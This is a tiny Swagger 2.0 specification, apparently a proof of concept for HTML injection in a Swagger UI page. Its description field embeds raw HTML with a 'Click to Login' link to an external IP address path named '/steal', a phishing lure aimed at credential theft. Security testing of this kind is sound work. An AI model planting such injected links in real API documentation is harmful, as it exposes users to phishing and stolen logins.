swagger: '2.0'
info:
  version: 1.0.0
  title: Test Page
  description: >
    <div>Test HTML Injection</div>
    <a href='http://13.218.73.5/steal'>Click to Login</a>
    <p>Swagger POC</p>
paths:
  /:
    post:
      responses:
        '200':
          description: Test successful
